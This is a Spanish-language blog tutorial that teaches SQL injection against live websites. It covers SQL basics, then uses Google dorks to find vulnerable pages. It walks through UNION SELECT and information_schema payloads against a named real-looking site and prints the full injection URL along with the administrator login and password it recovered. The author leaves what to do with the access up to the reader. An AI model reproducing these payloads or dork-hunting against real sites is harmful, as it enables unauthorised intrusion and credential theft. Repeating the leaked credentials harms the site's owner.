Introducción:
Hola a todos, En este tutorial les enseñare SQLi desde cero.
Al ser un tutorial con fines educativos y no destructivos. Solamente
veremos cómo obtener el usuario y contraseña de administrador. El resto
corre por cuenta de cada uno lo que quiera hacer con el acceso…
Se comenzara buscando una web cualquiera en google, buscaremos un lugar
en la web para inyectar, haremos la inyección y obtendremos los datos
de acceso. Pero antes comenzaremos con un poco de teoria.
SQL
Es un lenguaje normalizado, estructurado de consultas a bases de datos.
Esto quiere decir, que en casi todas las consultas a distintos tipos de
bases de datos, se usan las mismas sentencias.
SQL, cuenta con dos comandos, que son los DLL (permiten crear y definir
bases de datos, campos e índices) y por otro lado los comandos DML
(permiten generar consultas, filtrar y extraer datos de la base de
datos).
Nos centraremos en ese último, ya que SQLi, consiste en generar
consultas a la base de datos para que nos devuelva datos de interés.
Los comandos DML son:
Delete: Permite eliminar registros de la base de datos.
Update: Modifica valores de campos previamente creados.
Select: Sirve para consultas registros en la base de datos.
Insert: Carga lotes de datos en una base de datos.
Clausulas
Las clausulas son condiciones de modificación. Y se emplean para definir datos o manipularlos.
Entre las clausulas tenemos:
Order By: Ordena registros seleccionados
Group by: separa registros
Having: expresa una condición que debe satisfacer cada grupo
From: Sirve para especificar una tabla de la cual se quieren obtener registros
Where: Sirve para las condiciones que debe reunir un registro para ser seleccionado
Operadores Logicos
Los operadores lógicos o conectivos lógicos se utilizan para conectar
dos formulas para que el valor de verdad. Siempre darán un valor de
verdad verdadero o falso y se leen de izquierda a derecha.
Los operadores lógicos usados son:
Or: Evalua dos condiciones, devolviendo un valor de verdad verdadero si alguna de las dos es verdadera
And: Evalua dos condiciones y devuelve un valor de verdad verdadero, si ambas condiciones son iguales.
Not: Devuelve un valor contrario a la expresión. Si la expresión es True, devolverá False y viceversa
Operadores de comparación:
Los operadores de comparación, son utilizados para comparar dos valores o formulas.
Los operadores son:
< Menor que > Mayor que
<> Distinto que
>= Mayor o igual que
<= Menor o igual que
Between: especifica un intervalo de valores
Like: Compara un modelo
In: Especifica registros en una base de datos
Funciones de agregado
Estas formulas se utilizan dentro de la clausula Select en grupos de
registros para devolver un único valor que se aplica en un grupo de
registros.
Max: devuelve el valor más grande de un campo específico
Min: Devuelve el valor más chico de un campo especifico.
Sum: Se utiliza para devolver la suma de todos valores de un campo específico
Avg: calcula el promedio de un campo específico Count: Devuelve el
numero de registros de la selección Limit: devuelve un rango de
resultados deseados en lugar de todos los que puede devolver dicha
consulta.
Otras consultas
Veremos a continuación otras consultas que se suelen utilizar en las inyecciones SQL.
Union: Sirve para combinar el resultado de dos consultas juntas.
Information_schema.tables: Devuelve información de una tabla determinada
Information_schema.columns: Devuelve información de una columna determinada
Concat: Concatena los resultados de varios campos diferentes
Group_concat: devuelve como resultado una cadena de concatenación de un
grupo de valores no nulos Char: se utiliza para insertar caracteres de
control en cadenas de caracteres.
SQLi
Este tipo de ataque consiste en inyectar código SQL en una sentencia SQL
ya programada, con el fin de alterar el funcionamiento de la base de
datos.
Lo que haremos a lo largo de este tutorial, será inyectar código SQL a
una web, con el fin de ocasionarle errores a la base de datos para que
nos devuelva datos que usaremos en nuestra inyección y finalmente
obtener los datos de acceso al panel de administración.
Dorks:
Los Dorks son palabras claves que usaremos para encontrar sitios vulnerables.
Un ejemplo de dork seria el siguiente: noticia.php?id=
En google deberíamos poner lo siguiente: inurl: noticia.php?id=
Esto nos arrojara muchos resultados de sitios que quizás ya no sean
vulnerables. Pero es por eso que debemos ir alternando Dorks, hasta que
logremos dar con una.
El método para generar dorks seria cambiar el noticia por otro nombre, por ejemplo news, view, photo, etc. Y el resto quedaría igual.
Otra de las cosas a tener en cuenta, es que después de realizar la
búsqueda, ir a las páginas del final que son las que más desactualizadas
están y probablemente sean vulnerables.
Veremos a continuación un ejemplo:
Pero… ¿cómo me doy cuenta si es o no vulnerable?
Acá empieza la parte entretenida. Lo que debemos hacer es borrar lo que esta después de id= y provocar un error en la base de datos.
¿Y de qué forma podemos provocar un error?
Fácil… colocando caracteres no permitidos, por ejemplo una comilla, un numero negativo, etc. Colocare un -1 (uno negativo) y veremos cómo se comporta la web
Pagina original:
Ahora probemos colocando una comilla:
1
2
3
| Fatal error: Call to a member function RecordCount() on a non-object in /home/samg/public_html/include/objetos/Noticia.class.php on line 333 |
SQL Injection
Ahora probaremos si realmente es vulnerable o no a SQLi. Para ello, después del id= colocaremos lo siguiente:
1
| -1+UNION+SELECT+1,2-- |
Lo que debemos hacer ahora, es comenzar a añadir números, hasta que ese error desaparezca.
La inyección seria así:
1
2
3
| -1+UNION+SELECT+1,2,3-- -1+UNION+SELECT+1,2,3,4-- -1+UNION+SELECT+1,2,3,4,5-- |
Usare a ese 5 para que me muestre los nombres de las tablas en su lugar.
Lo que sigue ahora es agregar después del último número de la url el siguiente código:
1
| +from+information_schema.tables-- |
1
| +limit+2,1-- |
Quedaría algo así:
El limit debería ir de la siguiente forma:
1
2
3
4
| +limit+2,1-- +limit+3,1-- +limit+4,1-- +limit+5,1-- |
Y así sucesivamente hasta hallar una tabla importante. En mi caso llegue hasta la 38 y encontré la de administradores.
1
| 115 97 109 103 95 97 100 109 105 110 105 115 116 114 97 100 111 114 101 115 |
1
| 115,97,109,103,95,97,100,109,105,110,105,115,116,114,97,100,111,114,101,115 |
Ahora volvemos a nuestra inyección y cambiaremos table_name por group_concat(column_name) y information_schema.tables por
1
2
| information_schema.columns+where+table_name=char(115,97,109,103,95,97,100,109,105,11 0,105,115,116,114,97,100,111,114,101,115)-- |
Debería quedar así:
1
2
3
| http://www.samg.es/web/noticias/noticia.php?id=-1+UNION+SELECT+1,2,3,4,group_concat(column_name) ,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=char(115,97,109, 103,95,97,100,109,105,110,105,115,116,114,97,100,111,114,101,115)-- |
1
| group_concat(column_name) por concat(Login,0x3a,Password) |
Concat significa concatenar, algo similar que unir. Y el 0x3a, son dos puntos. Esto es para que el usuario y la contraseña no aparezcan juntas, sino que los separe los dos puntos. Teniendo un resultado algo así:
Usuario:Contraseña
Y borraremos desde information_schema.columns en adelante y dejaremos solamente el +from+
Y luego de ese from, colocamos el nombre de la tabla, que en mi caso se llamaba: samg_administradores
Quedándome lo siguiente:
1
2
| Usuario: samg Contraseña: samg06 |
Espero que les haya gustado y que les sea útil.
Saludos.
0 comentarios:
Publicar un comentario